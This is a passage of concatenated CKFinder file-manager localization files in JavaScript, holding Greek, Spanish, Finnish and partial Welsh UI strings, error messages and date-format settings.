επιλεγμένου αρχείου', UploadBtnCancel : 'Ακύρωση', UploadNoFileMsg : 'Παρακαλούμε επιλέξτε ένα αρχείο από τον υπολογιστή σας.', UploadNoFolder : 'Παρακαλούμε επιλέξτε ένα φάκελο πριν εκκινήσετε την διαδικασία της μεταφόρτωσης.', UploadNoPerms : 'Η μεταφόρτωση των αρχείων δεν επιτρέπεται.', UploadUnknError : 'Παρουσιάστηκε σφάλμα κατά την αποστολή του αρχείου.', UploadExtIncorrect : 'Η επέκταση του αρχείου δεν επιτρέπεται σε αυτόν τον φάκελο.', // Flash Uploads UploadLabel : 'Αρχεία προς μεταφόρτωση', UploadTotalFiles : 'Συνολικά αρχεία:', UploadTotalSize : 'Συνολικό μέγεθος:', UploadSend : 'Μεταφόρτωση', UploadAddFiles : 'Προσθήκη αρχείων', UploadClearFiles : 'Αφαίρεση αρχείων', UploadCancel : 'Ακύρωση μεταφόρτωσης', UploadRemove : 'Αφαίρεση', UploadRemoveTip : 'Αφαίρεση !f', UploadUploaded : 'Μεταφορτώθηκε !n%', UploadProcessing : 'Επεξεργασία...', // Settings Panel SetTitle : 'Ρυθμίσεις', SetView : 'Προβολή:', SetViewThumb : 'Μικρογραφίες', SetViewList : 'Λίστα', SetDisplay : 'Εμφάνιση:', SetDisplayName : 'Όνομα αρχείου', SetDisplayDate : 'Ημερομηνία', SetDisplaySize : 'Μέγεθος αρχείου', SetSort : 'Ταξινόμηση:', SetSortName : 'βάσει Όνοματος αρχείου', SetSortDate : 'βάσει Ημερομήνιας', SetSortSize : 'βάσει Μεγέθους', SetSortExtension : 'βάσει Επέκτασης', // Status Bar FilesCountEmpty : '<Κενός Φάκελος>', FilesCountOne : '1 αρχείο', FilesCountMany : '%1 αρχεία', // Size and Speed Kb : '%1 KB', Mb : '%1 MB', Gb : '%1 GB', SizePerSecond : '%1/s', // Connector Error Messages. ErrorUnknown : 'Η ενέργεια δεν ήταν δυνατόν να εκτελεστεί. (Σφάλμα %1)', Errors : { 10 : 'Λανθασμένη Εντολή.', 11 : 'Το resource type δεν ήταν δυνατόν να προσδιοριστεί.', 12 : 'Το resource type δεν είναι έγκυρο.', 102 : 'Το όνομα αρχείου ή φακέλου δεν είναι έγκυρο.', 103 : 'Δεν ήταν δυνατή η εκτέλεση της ενέργειας λόγω έλλειψης δικαιωμάτων ασφαλείας.', 104 : 'Δεν ήταν δυνατή η εκτέλεση της ενέργειας λόγω περιορισμών του συστήματος αρχείων.', 105 : 'Λανθασμένη επέκταση αρχείου.', 109 : 'Λανθασμένη ενέργεια.', 110 : 'Άγνωστο λάθος.', 111 : 'It was not possible to complete the request due to resulting file size.', // MISSING 115 : 'Το αρχείο ή φάκελος υπάρχει ήδη.', 116 : 'Ο φάκελος δεν βρέθηκε. Παρακαλούμε ανανεώστε τη σελίδα και προσπαθήστε ξανά.', 117 : 'Το αρχείο δεν βρέθηκε. Παρακαλούμε ανανεώστε τη σελίδα και προσπαθήστε ξανά.', 118 : 'Η αρχική και τελική διαδρομή είναι ίδιες.', 201 : 'Ένα αρχείο με την ίδια ονομασία υπάρχει ήδη. Το μεταφορτωμένο αρχείο μετονομάστηκε σε "%1".', 202 : 'Λανθασμένο αρχείο.', 203 : 'Λανθασμένο αρχείο. Το μέγεθος του αρχείου είναι πολύ μεγάλο.', 204 : 'Το μεταφορτωμένο αρχείο είναι χαλασμένο.', 205 : 'Δεν υπάρχει προσωρινός φάκελος για να χρησιμοποιηθεί για τις μεταφορτώσεις των αρχείων.', 206 : 'Η μεταφόρτωση ακυρώθηκε για λόγους ασφαλείας. Το αρχείο περιέχει δεδομένα μορφής HTML.', 207 : 'Το μεταφορτωμένο αρχείο μετονομάστηκε σε "%1".', 300 : 'Η μετακίνηση των αρχείων απέτυχε.', 301 : 'Η αντιγραφή των αρχείων απέτυχε.', 500 : 'Ο πλοηγός αρχείων έχει απενεργοποιηθεί για λόγους ασφαλείας. Παρακαλούμε επικοινωνήστε με τον διαχειριστή της ιστοσελίδας και ελέγξτε το αρχείο ρυθμίσεων του πλοηγού (CKFinder).', 501 : 'Η υποστήριξη των μικρογραφιών έχει απενεργοποιηθεί.' }, // Other Error Messages. ErrorMsg : { FileEmpty : 'Η ονομασία του αρχείου δεν μπορεί να είναι κενή.', FileExists : 'Το αρχείο %s υπάρχει ήδη.', FolderEmpty : 'Η ονομασία του φακέλου δεν μπορεί να είναι κενή.', FolderExists : 'Folder %s already exists.', // MISSING FolderNameExists : 'Folder already exists.', // MISSING FileInvChar : 'Η ονομασία του αρχείου δεν μπορεί να περιέχει τους ακόλουθους χαρακτήρες: \n\\ / : * ? " < > |', FolderInvChar : 'Η ονομασία του φακέλου δεν μπορεί να περιέχει τους ακόλουθους χαρακτήρες: \n\\ / : * ? " < > |', PopupBlockView : 'Δεν ήταν εφικτό να ανοίξει το αρχείο σε νέο παράθυρο. Παρακαλώ, ελέγξτε τις ρυθμίσεις τους πλοηγού σας και απενεργοποιήστε όλους τους popup blockers για αυτή την ιστοσελίδα.', XmlError : 'Δεν ήταν εφικτή η σωστή ανάγνωση του XML response από τον διακομιστή.', XmlEmpty : 'Δεν ήταν εφικτή η φόρτωση του XML response από τον διακομιστή. Ο διακομιστής επέστρεψε ένα κενό response.', XmlRawResponse : 'Raw response από τον διακομιστή: %s' }, // Imageresize plugin Imageresize : { dialogTitle : 'Αλλαγή διαστάσεων της εικόνας %s', sizeTooBig : 'Το πλάτος ή το ύψος της εικόνας δεν μπορεί να είναι μεγαλύτερα των αρχικών διαστάσεων (%size).', resizeSuccess : 'Οι διαστάσεις της εικόνας άλλαξαν επιτυχώς.', thumbnailNew : 'Δημιουργία νέας μικρογραφίας', thumbnailSmall : 'Μικρή (%s)', thumbnailMedium : 'Μεσαία (%s)', thumbnailLarge : 'Μεγάλη (%s)', newSize : 'Ορισμός νέου μεγέθους', width : 'Πλάτος', height : 'Ύψος', invalidHeight : 'Μη έγκυρο ύψος.', invalidWidth : 'Μη έγκυρο πλάτος.', invalidName : 'Μη έγκυρο όνομα αρχείου.', newImage : 'Δημιουργία νέας εικόνας', noExtensionChange : 'Η επέκταση του αρχείου δεν μπορεί να αλλάξει.', imageSmall : 'Η αρχική εικόνα είναι πολύ μικρή.', contextMenuName : 'Αλλαγή διαστάσεων', lockRatio : 'Κλείδωμα αναλογίας', resetSize : 'Επαναφορά αρχικού μεγέθους' }, // Fileeditor plugin Fileeditor : { save : 'Αποθήκευση', fileOpenError : 'Δεν ήταν εφικτό το άνοιγμα του αρχείου.', fileSaveSuccess : 'Το αρχείο αποθηκεύτηκε επιτυχώς.', contextMenuName : 'Επεξεργασία', loadingFile : 'Φόρτωση αρχείου, παρακαλώ περιμένετε...' }, Maximize : { maximize : 'Μεγιστοποίηση', minimize : 'Ελαχιστοποίηση' }, Gallery : { current : 'Εικόνα {current} από {total}' }, Zip : { extractHereLabel : 'Extract here', // MISSING extractToLabel : 'Extract to...', // MISSING downloadZipLabel : 'Download as zip', // MISSING compressZipLabel : 'Compress to zip', // MISSING removeAndExtract : 'Remove existing and extract', // MISSING extractAndOverwrite : 'Extract overwriting existing files', // MISSING extractSuccess : 'File extracted successfully.' // MISSING } };
JavaScript
/* * CKFinder * ======== * http://cksource.com/ckfinder * Copyright (C) 2007-2013, CKSource - Frederico Knabben. All rights reserved. * * The software, this file, and its contents are subject to the CKFinder * License. Please read the license.txt file before using, installing, copying, * modifying, or distributing this file or part of its contents. The contents of * this file is part of the Source Code of CKFinder. * */ /** * @fileOverview Defines the {@link CKFinder.lang} object for the Spanish * language. */ /** * Contains the dictionary of language entries. * @namespace */ CKFinder.lang['es'] = { appTitle : 'CKFinder', // Common messages and labels. common : { // Put the voice-only part of the label in the span. unavailable : '%1<span class="cke_accessibility">, no disponible</span>', confirmCancel : 'Algunas opciones se han cambiado\r\n¿Está seguro de querer cerrar el diálogo?', ok : 'Aceptar', cancel : 'Cancelar', confirmationTitle : 'Confirmación', messageTitle : 'Información', inputTitle : 'Pregunta', undo : 'Deshacer', redo : 'Rehacer', skip : 'Omitir', skipAll : 'Omitir todos', makeDecision : '¿Qué acción debe realizarse?', rememberDecision: 'Recordar mi decisión' }, // Language direction, 'ltr' or 'rtl'. dir : 'ltr', HelpLang : 'es', LangCode : 'es', // Date Format // d : Day // dd : Day (padding zero) // m : Month // mm : Month (padding zero) // yy : Year (two digits) // yyyy : Year (four digits) // h : Hour (12 hour clock) // hh : Hour (12 hour clock, padding zero) // H : Hour (24 hour clock) // HH : Hour (24 hour clock, padding zero) // M : Minute // MM : Minute (padding zero) // a : Firt char of AM/PM // aa : AM/PM DateTime : 'dd/mm/yyyy H:MM', DateAmPm : ['AM', 'PM'], // Folders FoldersTitle : 'Carpetas', FolderLoading : 'Cargando...', FolderNew : 'Por favor, escriba el nombre para la nueva carpeta: ', FolderRename : 'Por favor, escriba el nuevo nombre para la carpeta: ', FolderDelete : '¿Está seguro de que quiere borrar la carpeta "%1"?', FolderRenaming : ' (Renombrando...)', FolderDeleting : ' (Borrando...)', DestinationFolder : 'Destination Folder', // MISSING // Files FileRename : 'Por favor, escriba el nuevo nombre del fichero: ', FileRenameExt : '¿Está seguro de querer cambiar la extensión del fichero? El fichero puede dejar de ser usable.', FileRenaming : 'Renombrando...', FileDelete : '¿Está seguro de que quiere borrar el fichero "%1"?', FilesDelete : 'Are you sure you want to delete %1 files?', // MISSING FilesLoading : 'Cargando...', FilesEmpty : 'Carpeta vacía', DestinationFile : 'Destination File', // MISSING SkippedFiles : 'List of skipped files:', // MISSING // Basket BasketFolder : 'Cesta', BasketClear : 'Vaciar cesta', BasketRemove : 'Quitar de la cesta', BasketOpenFolder : 'Abrir carpeta padre', BasketTruncateConfirm : '¿Está seguro de querer quitar todos los ficheros de la cesta?', BasketRemoveConfirm : '¿Está seguro de querer quitar el fichero "%1" de la cesta?', BasketRemoveConfirmMultiple : 'Do you really want to remove %1 files from the basket?', // MISSING BasketEmpty : 'No hay ficheros en la cesta, arrastra y suelta algunos.', BasketCopyFilesHere : 'Copiar ficheros de la cesta', BasketMoveFilesHere : 'Mover ficheros de la cesta', // Global messages OperationCompletedSuccess : 'Operation completed successfully.', // MISSING OperationCompletedErrors : 'Operation completed with errors.', // MISSING FileError : '%s: %e', // MISSING // Move and Copy files MovedFilesNumber : 'Number of files moved: %s.', // MISSING CopiedFilesNumber : 'Number of files copied: %s.', // MISSING MoveFailedList : 'The following files could not be moved:<br />%s', // MISSING CopyFailedList : 'The following files could not be copied:<br />%s', // MISSING // Toolbar Buttons (some used elsewhere) Upload : 'Añadir', UploadTip : 'Añadir nuevo fichero', Refresh : 'Actualizar', Settings : 'Configuración', Help : 'Ayuda', HelpTip : 'Ayuda', // Context Menus Select : 'Seleccionar', SelectThumbnail : 'Seleccionar el icono', View : 'Ver', Download : 'Descargar', NewSubFolder : 'Nueva Subcarpeta', Rename : 'Renombrar', Delete : 'Borrar', DeleteFiles : 'Delete Files', // MISSING CopyDragDrop : 'Copiar aquí', MoveDragDrop : 'Mover aquí', // Dialogs RenameDlgTitle : 'Renombrar', NewNameDlgTitle : 'Nuevo nombre', FileExistsDlgTitle : 'Fichero existente', SysErrorDlgTitle : 'Error de sistema', FileOverwrite : 'Sobreescribir', FileAutorename : 'Auto-renombrar', ManuallyRename : 'Manually rename', // MISSING // Generic OkBtn : 'Aceptar', CancelBtn : 'Cancelar', CloseBtn : 'Cerrar', // Upload Panel UploadTitle : 'Añadir nuevo fichero', UploadSelectLbl : 'Elija el fichero a subir', UploadProgressLbl : '(Subida en progreso, por favor espere...)', UploadBtn : 'Subir el fichero elegido', UploadBtnCancel : 'Cancelar', UploadNoFileMsg : 'Por favor, elija un fichero de su ordenador.', UploadNoFolder : 'Por favor, escoja la carpeta antes de iniciar la subida.', UploadNoPerms : 'No puede subir ficheros.', UploadUnknError : 'Error enviando el fichero.', UploadExtIncorrect : 'La extensión del fichero no está permitida en esta carpeta.', // Flash Uploads UploadLabel : 'Ficheros a subir', UploadTotalFiles : 'Total de ficheros:', UploadTotalSize : 'Tamaño total:', UploadSend : 'Añadir', UploadAddFiles : 'Añadir ficheros', UploadClearFiles : 'Borrar ficheros', UploadCancel : 'Cancelar subida', UploadRemove : 'Quitar', UploadRemoveTip : 'Quitar !f', UploadUploaded : 'Enviado !n%', UploadProcessing : 'Procesando...', // Settings Panel SetTitle : 'Configuración', SetView : 'Vista:', SetViewThumb : 'Iconos', SetViewList : 'Lista', SetDisplay : 'Mostrar:', SetDisplayName : 'Nombre de fichero', SetDisplayDate : 'Fecha', SetDisplaySize : 'Tamaño del fichero', SetSort : 'Ordenar:', SetSortName : 'por Nombre', SetSortDate : 'por Fecha', SetSortSize : 'por Tamaño', SetSortExtension : 'por Extensión', // Status Bar FilesCountEmpty : '<Carpeta vacía>', FilesCountOne : '1 fichero', FilesCountMany : '%1 ficheros', // Size and Speed Kb : '%1 KB', Mb : '%1 MB', Gb : '%1 GB', SizePerSecond : '%1/s', // Connector Error Messages. ErrorUnknown : 'No ha sido posible completar la solicitud. (Error %1)', Errors : { 10 : 'Comando incorrecto.', 11 : 'El tipo de recurso no ha sido especificado en la solicitud.', 12 : 'El tipo de recurso solicitado no es válido.', 102 : 'Nombre de fichero o carpeta no válido.', 103 : 'No se ha podido completar la solicitud debido a las restricciones de autorización.', 104 : 'No ha sido posible completar la solicitud debido a restricciones en el sistema de ficheros.', 105 : 'La extensión del archivo no es válida.', 109 : 'Petición inválida.', 110 : 'Error desconocido.', 111 : 'It was not possible to complete the request due to resulting file size.', // MISSING 115 : 'Ya existe un fichero o carpeta con ese nombre.', 116 : 'No se ha encontrado la carpeta. Por favor, actualice y pruebe de nuevo.', 117 : 'No se ha encontrado el fichero. Por favor, actualice la lista de ficheros y pruebe de nuevo.', 118 : 'Las rutas origen y destino son iguales.', 201 : 'Ya existía un fichero con ese nombre. El fichero subido ha sido renombrado como "%1".', 202 : 'Fichero inválido.', 203 : 'Fichero inválido. El peso es demasiado grande.', 204 : 'El fichero subido está corrupto.', 205 : 'La carpeta temporal no está disponible en el servidor para las subidas.', 206 : 'La subida se ha cancelado por razones de seguridad. El fichero contenía código HTML.', 207 : 'El fichero subido ha sido renombrado como "%1".', 300 : 'Ha fallado el mover el(los) fichero(s).', 301 : 'Ha fallado el copiar el(los) fichero(s).', 500 : 'El navegador de archivos está deshabilitado por razones de seguridad. Por favor, contacte con el administrador de su sistema y compruebe el fichero de configuración de CKFinder.', 501 : 'El soporte para iconos está deshabilitado.' }, // Other Error Messages. ErrorMsg : { FileEmpty : 'El nombre del fichero no puede estar vacío.', FileExists : 'El fichero %s ya existe.', FolderEmpty : 'El nombre de la carpeta no puede estar vacío.', FolderExists : 'Folder %s already exists.', // MISSING FolderNameExists : 'Folder already exists.', // MISSING FileInvChar : 'El nombre del fichero no puede contener ninguno de los caracteres siguientes: \n\\ / : * ? " < > |', FolderInvChar : 'El nombre de la carpeta no puede contener ninguno de los caracteres siguientes: \n\\ / : * ? " < > |', PopupBlockView : 'No ha sido posible abrir el fichero en una nueva ventana. Por favor, configure su navegador y desactive todos los bloqueadores de ventanas para esta página.', XmlError : 'No ha sido posible cargar correctamente la respuesta XML del servidor.', XmlEmpty : 'No ha sido posible cargar correctamente la respuesta XML del servidor. El servidor envió una cadena vacía.', XmlRawResponse : 'Respuesta del servidor: %s' }, // Imageresize plugin Imageresize : { dialogTitle : 'Redimensionar %s', sizeTooBig : 'No se puede poner la altura o anchura de la imagen mayor que las dimensiones originales (%size).', resizeSuccess : 'Imagen redimensionada correctamente.', thumbnailNew : 'Crear nueva minuatura', thumbnailSmall : 'Pequeña (%s)', thumbnailMedium : 'Mediana (%s)', thumbnailLarge : 'Grande (%s)', newSize : 'Establecer nuevo tamaño', width : 'Ancho', height : 'Alto', invalidHeight : 'Altura inválida.', invalidWidth : 'Anchura inválida.', invalidName : 'Nombre no válido.', newImage : 'Crear nueva imagen', noExtensionChange : 'La extensión no se puede cambiar.', imageSmall : 'La imagen original es demasiado pequeña.', contextMenuName : 'Redimensionar', lockRatio : 'Proporcional', resetSize : 'Tamaño Original' }, // Fileeditor plugin Fileeditor : { save : 'Guardar', fileOpenError : 'No se puede abrir el fichero.', fileSaveSuccess : 'Fichero guardado correctamente.', contextMenuName : 'Editar', loadingFile : 'Cargando fichero, por favor espere...' }, Maximize : { maximize : 'Maximizar', minimize : 'Minimizar' }, Gallery : { current : 'Imagen {current} de {total}' }, Zip : { extractHereLabel : 'Extract here', // MISSING extractToLabel : 'Extract to...', // MISSING downloadZipLabel : 'Download as zip', // MISSING compressZipLabel : 'Compress to zip', // MISSING removeAndExtract : 'Remove existing and extract', // MISSING extractAndOverwrite : 'Extract overwriting existing files', // MISSING extractSuccess : 'File extracted successfully.' // MISSING } };
JavaScript
/* * CKFinder * ======== * http://cksource.com/ckfinder * Copyright (C) 2007-2013, CKSource - Frederico Knabben. All rights reserved. * * The software, this file, and its contents are subject to the CKFinder * License. Please read the license.txt file before using, installing, copying, * modifying, or distributing this file or part of its contents. The contents of * this file is part of the Source Code of CKFinder. * */ /** * @fileOverview Defines the {@link CKFinder.lang} object for the Finnish * language. Translated into Finnish 2010-12-15 by Petteri Salmela, * updated. */ /** * Contains the dictionary of language entries. * @namespace */ CKFinder.lang['fi'] = { appTitle : 'CKFinder', // Common messages and labels. common : { // Put the voice-only part of the label in the span. unavailable : '%1<span class="cke_accessibility">, ei käytettävissä</span>', confirmCancel : 'Valintoja on muutettu. Suljetaanko ikkuna kuitenkin?', ok : 'OK', cancel : 'Peru', confirmationTitle : 'Varmistus', messageTitle : 'Ilmoitus', inputTitle : 'Kysymys', undo : 'Peru', redo : 'Tee uudelleen', skip : 'Ohita', skipAll : 'Ohita kaikki', makeDecision : 'Mikä toiminto suoritetaan?', rememberDecision: 'Muista valintani' }, // Language direction, 'ltr' or 'rtl'. dir : 'ltr', HelpLang : 'fi', LangCode : 'fi', // Date Format // d : Day // dd : Day (padding zero) // m : Month // mm : Month (padding zero) // yy : Year (two digits) // yyyy : Year (four digits) // h : Hour (12 hour clock) // hh : Hour (12 hour clock, padding zero) // H : Hour (24 hour clock) // HH : Hour (24 hour clock, padding zero) // M : Minute // MM : Minute (padding zero) // a : Firt char of AM/PM // aa : AM/PM DateTime : 'yyyy-mm-dd HH:MM', DateAmPm : ['AM', 'PM'], // Folders FoldersTitle : 'Kansiot', FolderLoading : 'Lataan...', FolderNew : 'Kirjoita uuden kansion nimi: ', FolderRename : 'Kirjoita uusi nimi kansiolle ', FolderDelete : 'Haluatko varmasti poistaa kansion "%1"?', FolderRenaming : ' (Uudelleennimeää...)', FolderDeleting : ' (Poistaa...)', DestinationFolder : 'Destination Folder', // MISSING // Files FileRename : 'Kirjoita uusi tiedostonimi: ', FileRenameExt : 'Haluatko varmasti muuttaa tiedostotarkennetta? Tiedosto voi muuttua käyttökelvottomaksi.', FileRenaming : 'Uudelleennimeää...', FileDelete : 'Haluatko varmasti poistaa tiedoston "%1"?', FilesDelete : 'Are you sure you want to delete %1 files?', // MISSING FilesLoading : 'Lataa...', FilesEmpty : 'Tyhjä kansio.', DestinationFile : 'Destination File', // MISSING SkippedFiles : 'List of skipped files:', // MISSING // Basket BasketFolder : 'Kori', BasketClear : 'Tyhjennä kori', BasketRemove : 'Poista korista', BasketOpenFolder : 'Avaa ylemmän tason kansio', BasketTruncateConfirm : 'Haluatko todella poistaa kaikki tiedostot korista?', BasketRemoveConfirm : 'Haluatko todella poistaa tiedoston "%1" korista?', BasketRemoveConfirmMultiple : 'Do you really want to remove %1 files from the basket?', // MISSING BasketEmpty : 'Korissa ei ole tiedostoja. Lisää raahaamalla.', BasketCopyFilesHere : 'Kopioi tiedostot korista.', BasketMoveFilesHere : 'Siirrä tiedostot korista.', // Global messages OperationCompletedSuccess : 'Operation completed successfully.', // MISSING OperationCompletedErrors : 'Operation completed with errors.', // MISSING FileError : '%s: %e', // MISSING // Move and Copy files MovedFilesNumber : 'Number of files moved: %s.', // MISSING CopiedFilesNumber : 'Number of files copied: %s.', // MISSING MoveFailedList : 'The following files could not be moved:<br />%s', // MISSING CopyFailedList : 'The following files could not be copied:<br />%s', // MISSING // Toolbar Buttons (some used elsewhere) Upload : 'Lataa palvelimelle', UploadTip : 'Lataa uusi tiedosto palvelimelle', Refresh : 'Päivitä', Settings : 'Asetukset', Help : 'Apua', HelpTip : 'Apua', // Context Menus Select : 'Valitse', SelectThumbnail : 'Valitse esikatselukuva', View : 'Näytä', Download : 'Lataa palvelimelta', NewSubFolder : 'Uusi alikansio', Rename : 'Uudelleennimeä ', Delete : 'Poista', DeleteFiles : 'Delete Files', // MISSING CopyDragDrop : 'Kopioi tähän', MoveDragDrop : 'Siirrä tähän', // Dialogs RenameDlgTitle : 'Nimeä uudelleen', NewNameDlgTitle : 'Uusi nimi', FileExistsDlgTitle : 'Tiedostonimi on jo olemassa!', SysErrorDlgTitle : 'Järjestelmävirhe', FileOverwrite : 'Ylikirjoita', FileAutorename : 'Nimeä uudelleen automaattisesti', ManuallyRename : 'Manually rename', // MISSING // Generic OkBtn : 'OK', CancelBtn : 'Peru', CloseBtn : 'Sulje', // Upload Panel UploadTitle : 'Lataa uusi tiedosto palvelimelle', UploadSelectLbl : 'Valitse ladattava tiedosto', UploadProgressLbl : '(Lataaminen palvelimelle käynnissä...)', UploadBtn : 'Lataa valittu tiedosto palvelimelle', UploadBtnCancel : 'Peru', UploadNoFileMsg : 'Valitse tiedosto tietokoneeltasi.', UploadNoFolder : 'Valitse kansio ennen palvelimelle lataamista.', UploadNoPerms : 'Tiedoston lataaminen palvelimelle evätty.', UploadUnknError : 'Tiedoston siirrossa tapahtui virhe.', UploadExtIncorrect : 'Tiedostotarkenne ei ole sallittu valitussa kansiossa.', // Flash Uploads UploadLabel : 'Ladattavat tiedostot', UploadTotalFiles : 'Tiedostoja yhteensä:', UploadTotalSize : 'Yhteenlaskettu tiedostokoko:', UploadSend : 'Lataa palvelimelle', UploadAddFiles : 'Lisää tiedostoja', UploadClearFiles : 'Poista tiedostot', UploadCancel : 'Peru lataus', UploadRemove : 'Poista', UploadRemoveTip : 'Poista !f', UploadUploaded : 'Ladattu !n%', UploadProcessing : 'Käsittelee...', // Settings Panel SetTitle : 'Asetukset', SetView : 'Näkymä:', SetViewThumb : 'Esikatselukuvat', SetViewList : 'Luettelo', SetDisplay : 'Näytä:', SetDisplayName : 'Tiedostonimi', SetDisplayDate : 'Päivämäärä', SetDisplaySize : 'Tiedostokoko', SetSort : 'Lajittele:', SetSortName : 'aakkosjärjestykseen', SetSortDate : 'päivämäärän mukaan', SetSortSize : 'tiedostokoon mukaan', SetSortExtension : 'tiedostopäätteen mukaan', // Status Bar FilesCountEmpty : '<Tyhjä kansio>', FilesCountOne : '1 tiedosto', FilesCountMany : '%1 tiedostoa', // Size and Speed Kb : '%1 kt', Mb : '%1 Mt', Gb : '%1 Gt', SizePerSecond : '%1/s', // Connector Error Messages. ErrorUnknown : 'Pyyntöä ei voitu suorittaa. (Virhe %1)', Errors : { 10 : 'Virheellinen komento.', 11 : 'Pyynnön resurssityyppi on määrittelemättä.', 12 : 'Pyynnön resurssityyppi on virheellinen.', 102 : 'Virheellinen tiedosto- tai kansionimi.', 103 : 'Oikeutesi eivät riitä pyynnön suorittamiseen.', 104 : 'Tiedosto-oikeudet eivät riitä pyynnön suorittamiseen.', 105 : 'Virheellinen tiedostotarkenne.', 109 : 'Virheellinen pyyntö.', 110 : 'Tuntematon virhe.', 111 : 'It was not possible to complete the request due to resulting file size.', // MISSING 115 : 'Samanniminen tiedosto tai kansio on jo olemassa.', 116 : 'Kansiota ei löydy. Yritä uudelleen kansiopäivityksen jälkeen.', 117 : 'Tiedostoa ei löydy. Yritä uudelleen kansiopäivityksen jälkeen.', 118 : 'Lähde- ja kohdekansio on sama!', 201 : 'Samanniminen tiedosto on jo olemassa. Palvelimelle ladattu tiedosto on nimetty: "%1".', 202 : 'Virheellinen tiedosto.', 203 : 'Virheellinen tiedosto. Tiedostokoko on liian suuri.', 204 : 'Palvelimelle ladattu tiedosto on vioittunut.', 205 : 'Väliaikaishakemistoa ei ole määritetty palvelimelle lataamista varten.', 206 : 'Palvelimelle lataaminen on peruttu turvallisuussyistä. Tiedosto sisältää HTML-tyylistä dataa.', 207 : 'Palvelimelle ladattu tiedosto on nimetty: "%1".', 300 : 'Tiedostosiirto epäonnistui.', 301 : 'Tiedostokopiointi epäonnistui.', 500 : 'Tiedostoselain on kytketty käytöstä turvallisuussyistä. Pyydä pääkäyttäjää tarkastamaan CKFinderin asetustiedosto.', 501 : 'Esikatselukuvien tuki on kytketty toiminnasta.' }, // Other Error Messages. ErrorMsg : { FileEmpty : 'Tiedosto on nimettävä!', FileExists : 'Tiedosto %s on jo olemassa.', FolderEmpty : 'Kansio on nimettävä!', FolderExists : 'Folder %s already exists.', // MISSING FolderNameExists : 'Folder already exists.', // MISSING FileInvChar : 'Tiedostonimi ei voi sisältää seuraavia merkkejä: \n\\ / : * ? " < > |', FolderInvChar : 'Kansionimi ei voi sisältää seuraavia merkkejä: \n\\ / : * ? " < > |', PopupBlockView : 'Tiedostoa ei voitu avata uuteen ikkunaan. Salli selaimesi asetuksissa ponnahdusikkunat tälle sivulle.', XmlError : 'Web-palvelimen XML-vastausta ei pystytty kunnolla lataamaan.', XmlEmpty : 'Web-palvelimen XML vastausta ei pystytty lataamaan. Palvelin palautti tyhjän vastauksen.', XmlRawResponse : 'Palvelimen käsittelemätön vastaus: %s' }, // Imageresize plugin Imageresize : { dialogTitle : 'Muuta kokoa %s', sizeTooBig : 'Kuvan mittoja ei voi asettaa alkuperäistä suuremmiksi(%size).', resizeSuccess : 'Kuvan koon muuttaminen onnistui.', thumbnailNew : 'Luo uusi esikatselukuva.', thumbnailSmall : 'Pieni (%s)', thumbnailMedium : 'Keskikokoinen (%s)', thumbnailLarge : 'Suuri (%s)', newSize : 'Aseta uusi koko', width : 'Leveys', height : 'Korkeus', invalidHeight : 'Viallinen korkeus.', invalidWidth : 'Viallinen leveys.', invalidName : 'Viallinen tiedostonimi.', newImage : 'Luo uusi kuva', noExtensionChange : 'Tiedostomäärettä ei voi vaihtaa.', imageSmall : 'Lähdekuva on liian pieni.', contextMenuName : 'Muuta kokoa', lockRatio : 'Lukitse suhteet', resetSize : 'Alkuperäinen koko' }, // Fileeditor plugin Fileeditor : { save : 'Tallenna', fileOpenError : 'Tiedostoa ei voi avata.', fileSaveSuccess : 'Tiedoston tallennus onnistui.', contextMenuName : 'Muokkaa', loadingFile : 'Tiedostoa ladataan ...' }, Maximize : { maximize : 'Suurenna', minimize : 'Pienennä' }, Gallery : { current : 'Kuva {current} / {total}' }, Zip : { extractHereLabel : 'Extract here', // MISSING extractToLabel : 'Extract to...', // MISSING downloadZipLabel : 'Download as zip', // MISSING compressZipLabel : 'Compress to zip', // MISSING removeAndExtract : 'Remove existing and extract', // MISSING extractAndOverwrite : 'Extract overwriting existing files', // MISSING extractSuccess : 'File extracted successfully.' // MISSING } };
JavaScript
/* * CKFinder * ======== * http://cksource.com/ckfinder * Copyright (C) 2007-2013, CKSource - Frederico Knabben. All rights reserved. * * The software, this file, and its contents are subject to the CKFinder * License. Please read the license.txt file before using, installing, copying, * modifying, or distributing this file or part of its contents. The contents of * this file is part of the Source Code of CKFinder. * */ /** * @fileOverview Defines the {@link CKFinder.lang} object for the Welsh * language. */ /** * Contains the dictionary of language entries. * @namespace */ CKFinder.lang['cy'] = { appTitle : 'CKFinder', // Common messages and labels. common : { // Put the voice-only part of the label in the span. unavailable : '%1<span class="cke_accessibility">, ddim ar gael</span>', confirmCancel : 'Cafodd rhai o\'r opsiynau eu newid. Ydych chi wir am gau ffenestr y deialog?', ok : 'Iawn', cancel : 'Diddymu', confirmationTitle : 'Cadarnhad', messageTitle : 'Gwybodaeth', inputTitle : 'Cwestiwn', undo : 'Dadwneud', redo : 'Ailadrodd', skip : 'Neidio', skipAll : 'Neidio pob', makeDecision : 'Pa weithred i\'w chymryd?', rememberDecision: 'Cofio fy mhenderfyniad' }, // Language direction, 'ltr' or 'rtl'. dir : 'ltr', HelpLang : 'en', LangCode : 'cy', // Date Format // d : Day // dd : Day (padding zero) // m : Month // mm : Month (padding zero) // yy : Year (two digits) // yyyy : Year (four digits) // h : Hour (12 hour clock) // hh : Hour (12 hour clock, padding zero) // H : Hour (24 hour clock) // HH : Hour (24 hour clock, padding zero) // M : Minute // MM : Minute (padding zero) // a : Firt char of AM/PM // aa : AM/PM DateTime : 'mm/dd/yyyy HH:MM', DateAmPm : ['YB', 'YH'], // Folders FoldersTitle : 'Ffolderi', FolderLoading : 'Yn llwytho...', FolderNew : 'Rhowch enw newydd y ffolder: ', FolderRename : 'Rhowch enw newydd y ffolder: ', FolderDelete : 'Ydych chi wir am ddileu\'r ffolder "%1"?', FolderRenaming : ' (Yn ailenwi...)', FolderDeleting : ' (Yn dileu...)', DestinationFolder : 'Destination Folder', // MISSING // Files FileRename : 'Rhowch enw newydd y ffeil: ', FileRenameExt : 'Ydych chi wir am newid estyniad y ffeil? Gall hwn atal y ffeil rhag gweithio.', FileRenaming : 'Yn ailenwi...', FileDelete : 'Ydych chi wir am ddileu\'r ffeil "%1"?', FilesDelete : 'Are you sure you want to delete %1 files?', // MISSING FilesLoading : 'Yn llwytho...', FilesEmpty : 'Mae\'r ffolder yn wag.', DestinationFile : 'Destination File', // MISSING SkippedFiles : 'List of skipped files:', // MISSING // Basket BasketFolder : 'Basged', BasketClear : 'Clirio\'r Fasged', BasketRemove : 'Tynnu o\'r Fasged', BasketOpenFolder : 'Agor yr Uwch Ffolder', BasketTruncateConfirm : 'Ydych chi wir am dynnu\'r holl ffeiliau o\'r fasged?', 